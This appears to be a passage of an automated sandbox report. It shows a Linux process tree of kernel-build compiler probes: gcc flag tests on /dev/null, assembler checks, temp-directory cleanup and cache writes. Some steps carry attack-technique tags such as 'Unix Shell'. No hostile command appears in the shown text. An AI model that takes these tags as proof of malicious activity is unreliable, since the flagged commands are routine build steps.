/usr/sbin/asas --64 -o /tmp/a/.tmp_1706/tmp /tmp/ccbzI08g.s5⤵PID:1710
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1706/tmp /tmp/ccbzI08g.s5⤵PID:1710
-
/bin/rmrm -rf /tmp/a/.tmp_17064⤵PID:1711
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mno-fp-ret-in-387\";_else_echo_\"\";_fi := -mno-fp-ret-in-387' >> /tmp/a/.cache.mk"3⤵PID:1712
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mpreferred-stack-boundary=3\"; else echo \"\"; fi"3⤵PID:1713
-
/bin/mkdirmkdir -p /tmp/a/.tmp_17134⤵
- Reads runtime system information
PID:1714 -
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -c -x c /dev/null -o /tmp/a/.tmp_1713/tmp4⤵PID:1715
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1713/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -fstack-protector-strong -o /tmp/cc8NKwOk.s5⤵PID:1716
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1713/tmp /tmp/cc8NKwOk.s5⤵PID:1717
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1713/tmp /tmp/cc8NKwOk.s5⤵PID:1717
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1713/tmp /tmp/cc8NKwOk.s5⤵PID:1717
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1713/tmp /tmp/cc8NKwOk.s5⤵PID:1717
-
/bin/rmrm -rf /tmp/a/.tmp_17134⤵PID:1718
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mpreferred-stack-boundary_3\";_else_echo_\"\";_fi := -mpreferred-stack-boundary=3' >> /tmp/a/.cache.mk"3⤵PID:1719
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mskip-rax-setup\"; else echo \"\"; fi"3⤵PID:1720
-
/bin/mkdirmkdir -p /tmp/a/.tmp_17204⤵PID:1721
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup -c -x c /dev/null -o /tmp/a/.tmp_1720/tmp4⤵PID:1722
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1720/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -fstack-protector-strong -o /tmp/ccFRKlxj.s5⤵
- Writes file to tmp directory
PID:1723 -
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1720/tmp /tmp/ccFRKlxj.s5⤵PID:1724
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1720/tmp /tmp/ccFRKlxj.s5⤵PID:1724
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1720/tmp /tmp/ccFRKlxj.s5⤵PID:1724
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1720/tmp /tmp/ccFRKlxj.s5⤵
- Writes file to tmp directory
PID:1724 -
/bin/rmrm -rf /tmp/a/.tmp_17204⤵PID:1725
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mskip-rax-setup\";_else_echo_\"\";_fi := -mskip-rax-setup' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1726 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mtune=generic\"; else echo \"\"; fi"3⤵PID:1727
-
/bin/mkdirmkdir -p /tmp/a/.tmp_17274⤵PID:1728
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -c -x c /dev/null -o /tmp/a/.tmp_1727/tmp4⤵
- Writes file to tmp directory
PID:1729 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1727/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -fstack-protector-strong -o /tmp/cciQE6Tm.s5⤵PID:1730
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1727/tmp /tmp/cciQE6Tm.s5⤵PID:1731
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1727/tmp /tmp/cciQE6Tm.s5⤵PID:1731
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1727/tmp /tmp/cciQE6Tm.s5⤵PID:1731
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1727/tmp /tmp/cciQE6Tm.s5⤵PID:1731
-
/bin/rmrm -rf /tmp/a/.tmp_17274⤵PID:1732
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mtune_generic\";_else_echo_\"\";_fi := -mtune=generic' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1733 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-funit-at-a-time\"; else echo \"\"; fi"3⤵PID:1734
-
/bin/mkdirmkdir -p /tmp/a/.tmp_17344⤵PID:1735
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -c -x c /dev/null -o /tmp/a/.tmp_1734/tmp4⤵PID:1736
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1734/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fstack-protector-strong -o /tmp/ccjC1NGm.s5⤵PID:1737
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1734/tmp /tmp/ccjC1NGm.s5⤵PID:1738
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1734/tmp /tmp/ccjC1NGm.s5⤵PID:1738
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1734/tmp /tmp/ccjC1NGm.s5⤵PID:1738
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1734/tmp /tmp/ccjC1NGm.s5⤵
- Writes file to tmp directory
PID:1738 -
/bin/rmrm -rf /tmp/a/.tmp_17344⤵PID:1739
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-funit-at-a-time\";_else_echo_\"\";_fi := -funit-at-a-time' >> /tmp/a/.cache.mk"3⤵PID:1740
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( /bin/echo -e '1: .quad 1b' | gcc -D__ASSEMBLY__ -fno-PIE -m64 -c -x assembler -o \"\$TMP\" - && objcopy -O elf32-x86-64 \"\$TMP\" \"\$TMPO\" && ld -m elf32_x86_64 \"\$TMPO\" -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1741 -
/bin/mkdirmkdir -p /tmp/a/.tmp_17414⤵PID:1742
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -c -x assembler -o /tmp/a/.tmp_1741/tmp -4⤵PID:1745
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1741/tmp -5⤵PID:1746
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1741/tmp -5⤵PID:1746
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1741/tmp -5⤵PID:1746
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1741/tmp -5⤵PID:1746
-
/bin/echo/bin/echo -e "1: .quad 1b"4⤵PID:1744
-
/usr/bin/objcopyobjcopy -O elf32-x86-64 /tmp/a/.tmp_1741/tmp /tmp/a/.tmp_1741/tmp.o4⤵PID:1747
-
/usr/bin/ldld -m elf32_x86_64 /tmp/a/.tmp_1741/tmp.o -o /tmp/a/.tmp_1741/tmp4⤵PID:1743
-
/bin/rmrm -rf /tmp/a/.tmp_17414⤵PID:1748
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -mfentry -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1749
-
/bin/mkdirmkdir -p /tmp/a/.tmp_17494⤵PID:1750
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI -mfentry -c -x c /dev/null -o /tmp/a/.tmp_1749/tmp4⤵
- Writes file to tmp directory
PID:1751 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1749/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fstack-protector-strong -o /tmp/ccoHbZ1o.s5⤵
- Writes file to tmp directory
PID:1752 -
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1749/tmp /tmp/ccoHbZ1o.s5⤵PID:1753
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1749/tmp /tmp/ccoHbZ1o.s5⤵PID:1753
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1749/tmp /tmp/ccoHbZ1o.s5⤵PID:1753
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1749/tmp /tmp/ccoHbZ1o.s5⤵PID:1753
-
/bin/rmrm -rf /tmp/a/.tmp_17494⤵PID:1754
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI__-mfentry_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"y\";_else_echo_\"n\";_fi := y' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
- Writes file to tmp directory
PID:1755 -
/bin/bash/bin/bash ./scripts/gcc-version.sh -p gcc3⤵PID:1756
-
/usr/bin/tailtail -n 14⤵PID:1760
-
/usr/bin/gccgcc -E -x c -4⤵PID:1759
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -E -quiet -imultiarch x86_64-linux-gnu - "-mtune=generic" "-march=x86-64" -fstack-protector-strong -Wformat -Wformat-security5⤵PID:1761
-
/usr/bin/tailtail -n 14⤵PID:1765
-
/usr/bin/gccgcc -E -x c -4⤵PID:1764
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -E -quiet -imultiarch x86_64-linux-gnu - "-mtune=generic" "-march=x86-64" -fstack-protector-strong -Wformat -Wformat-security5⤵PID:1766
-
/usr/bin/tailtail -n 14⤵PID:1770
-
/usr/bin/gccgcc -E -x c -4⤵PID:1769
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -E -quiet -imultiarch x86_64-linux-gnu - "-mtune=generic" "-march=x86-64" -fstack-protector-strong -Wformat -Wformat-security5⤵PID:1771
-
/bin/sh/bin/sh -c "echo '__cached_/bin/bash_./scripts/gcc-version.sh_-p_gcc := 070500' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1772 -
/bin/sh/bin/sh -c "[ 070500 -lt 040502 ] && echo 1 || echo "3⤵PID:1773
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \".cfi_startproc\\n.cfi_rel_offset rsp,0\\n.cfi_endproc\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_CFI=1\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1774 -
/bin/mkdirmkdir -p /tmp/a/.tmp_17744⤵PID:1775
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1774/tmp -4⤵PID:1778
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1774/tmp -5⤵PID:1779
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1774/tmp -5⤵PID:1779
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1774/tmp -5⤵PID:1779
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1774/tmp -5⤵
- Writes file to tmp directory
PID:1779 -
/bin/rmrm -rf /tmp/a/.tmp_17744⤵PID:1780
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\".cfi_startproc_n.cfi_rel_offset_rsp_0_n.cfi_endproc\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_CFI_1\";_else_echo_\"\";_fi := -DCONFIG_AS_CFI=1' >> /tmp/a/.cache.mk"3⤵PID:1781
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \".cfi_startproc\\n.cfi_signal_frame\\n.cfi_endproc\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_CFI_SIGNAL_FRAME=1\"; else echo \"\"; fi"3⤵PID:1782
-
/bin/mkdirmkdir -p /tmp/a/.tmp_17824⤵PID:1783
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1782/tmp -4⤵PID:1786
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1782/tmp -5⤵PID:1787
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1782/tmp -5⤵PID:1787
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1782/tmp -5⤵PID:1787
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1782/tmp -5⤵PID:1787
-
/bin/rmrm -rf /tmp/a/.tmp_17824⤵PID:1788
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___printf_\"%b_n\"_\".cfi_startproc_n.cfi_signal_frame_n.cfi_endproc\"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_\"_TMP\"_-__>/dev/null_2>&1;_then_echo_\"-DCONFIG_AS_CFI_SIGNAL_FRAME_1\";_else_echo_\"\";_fi := -DCONFIG_AS_CFI_SIGNAL_FRAME=1' >> /tmp/a/.cache.mk"3⤵PID:1789
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( printf \"%b\\n\" \".cfi_sections .debug_frame\" | gcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o \"\$TMP\" -) >/dev/null 2>&1; then echo \"-DCONFIG_AS_CFI_SECTIONS=1\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1790 -
/bin/mkdirmkdir -p /tmp/a/.tmp_17904⤵PID:1791
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -DCONFIG_X86_X32_ABI -c -x assembler -o /tmp/a/.tmp_1790/tmp -4⤵PID:1794
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1790/tmp -5⤵PID:1795
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1790/tmp -5⤵PID:1795
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1790/tmp -5⤵PID:1795
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1790/tmp -5⤵
- Writes file to tmp directory
PID:1795 -
